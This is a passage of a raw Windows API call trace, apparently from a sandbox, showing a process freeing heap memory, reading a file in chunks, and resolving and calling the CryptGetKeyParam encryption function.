hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.301] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0173.301] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0xce08, lpOverlapped=0x0) returned 1 [0173.303] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0173.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0173.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0173.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0173.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.304] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0173.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0173.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.305] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.305] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.305] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0173.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.306] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.306] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0173.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0173.306] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0173.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0173.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.307] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.307] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.307] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0173.307] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.308] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0173.308] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.309] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0173.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0173.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.310] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0173.310] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c28c8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28c8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 